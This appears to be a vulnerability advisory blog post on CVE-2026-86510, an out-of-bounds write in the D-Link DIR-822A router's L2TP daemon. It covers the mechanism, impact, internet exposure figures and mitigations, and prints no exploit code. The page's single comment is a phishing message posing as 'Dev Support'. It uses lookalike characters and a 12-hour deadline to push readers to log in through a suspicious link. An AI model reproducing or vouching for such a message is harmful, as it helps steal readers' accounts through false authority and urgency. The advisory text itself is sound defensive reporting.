Public Exploit Code and No Patch: The D-Link DIR-822A L2TP Flaw in Context
Vulnerability overview
CVE-2026-86510 is an out-of-bounds write in the L2TP control message handling of the D-Link
DIR-822A, rated 9.9 on the CVSSv3 scale. What makes the disclosure notable is not only the severity
but the timing: working proof-of-concept code is already public, and the vendor has not yet shipped
a fix. Affected firmware is A_101.
Mechanism and exploitation conditions
The vulnerable code path is tunnel_set_params, which processes parameters carried in an L2TP
control message. The function copies data from the packet into a fixed structure without checking
that the incoming length fits. Excess data lands in adjacent memory.
Reaching this code requires network access to the device. The attacker sends malformed control
packets to the L2TP daemon and lets the parser do the rest. The disclosure does not publish a
byte-precise analysis, so the honest summary is: known bug class, known function, known attacker
position, unknown exploitation reliability against a specific build.
Impact
Memory corruption in a network daemon is a two-stage risk. The first stage is availability — the
process crashes, and on an embedded router that can mean a reboot loop or a device that stops
forwarding traffic. The second stage is integrity and confidentiality — if the corruption can be
steered, the attacker gains code execution inside a process that handles network traffic.
The second stage is what a 9.9 score implies. It is also the stage that public proof-of-concept
code makes more likely to be attempted, because the barrier to entry drops from "find the bug" to
"adapt the published exploit."
Affected products and scope
The DIR-822A on firmware A_101 is the confirmed affected configuration. D-Link's public position is
that it is reviewing the vulnerability, the affected product scope, and remediation options. That
wording leaves the door open to a wider scope; it does not confirm one.
Exposure context
ZoomEye returned 624 assets for the model title query title="DIR-822" and 6,697,454 assets for the broader vendor fingerprint app="D-Link". The vendor-wide number says nothing about which firmware is installed, so the model-specific count is the figure worth quoting. Even that number only proves that DIR-822 family devices are reachable from the internet or a scanned network; it does not prove that any of them are exploitable.
Remediation and mitigations
With no patch available, mitigation is about reducing reachability:
- Keep the router off untrusted segments and disable remote administration from the WAN.
- Separate guest networks from the management interface.
- Monitor D-Link's security page for a fixed firmware release.
- If the model reaches end of support without a patch, replace it rather than relying on workarounds indefinitely.
References
- D-Link DIR-822A Vulnerabilities Details and PoC Disclosed — https://securityonline.info/d-link-dir-822a-vulnerabilities-poc/
- CVE-2026-86510 — https://www.cve.org/CVERecord?id=CVE-2026-86510
- CVE-2026-86296 — https://www.cve.org/CVERecord?id=CVE-2026-86296
Top comments (1)
Deаr Usеr,
Due to an іncrease in bot actіvіtу оn the plаtform, we require verifу оf your account.
Pleаse log in vіa thе lіnk below:
• anti-bot.icu/5K0N5G7M9C4
Verificated deаdline - 12 hours.
Sincerely,Dev Suppоrt